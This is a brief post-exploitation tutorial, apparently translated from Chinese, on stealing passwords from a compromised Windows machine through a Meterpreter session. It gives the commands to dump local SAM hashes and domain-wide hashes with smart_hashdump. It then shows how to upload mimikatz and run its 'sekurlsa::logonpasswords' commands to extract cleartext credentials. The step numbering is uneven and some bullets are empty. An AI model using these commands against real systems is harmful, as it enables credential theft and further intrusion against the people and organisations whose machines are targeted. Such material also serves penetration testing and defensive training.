MSF grab password
Export password hashes
- run hashdump command
The hashdump module can export local user accounts from the SAM database. The use of this command requires system permissions. - Execute the run hashdump command in meterpreter_shell
命令:
run hashdump
The output format of user hash data is:
用户名:SID:LM哈希:NTLM哈希:::
3. Run windows/gather/smart_hashdump command
The use of run windows/gather/smart_hashdump command requires system permissions. This function is more powerful. If the current user is a domain administrator user, you can export the hashes of all users in the domain.
命令:run windows/gather/smart_hashdump
4. Use mimikatx to grab passwords:
- Upload the mimikatz program:
We can also obtain the clear text password by uploading the mimikatz program and then executing the mimikatz program - premise:
System permissions are required to execute mimikatz, and when executing, selection must be made based on the current system bit number.
- Instructions:
Check the permissions of the current session in the command line of meterpreter_shell. You can see that the session system permissions are currently used.
-
Check the system digits and you can see that the current system digits are X64 bits:
-
Select x64-bit mimikatz to upload to the target server:
Command:
upload file
6) Enter the interactive interface of mimikatz
execute -i -f mimikatz.exe
7) In the mimikatz interactive interface, use the following two commands to grab the password
privilege::debug
sekurlsa::logonpasswords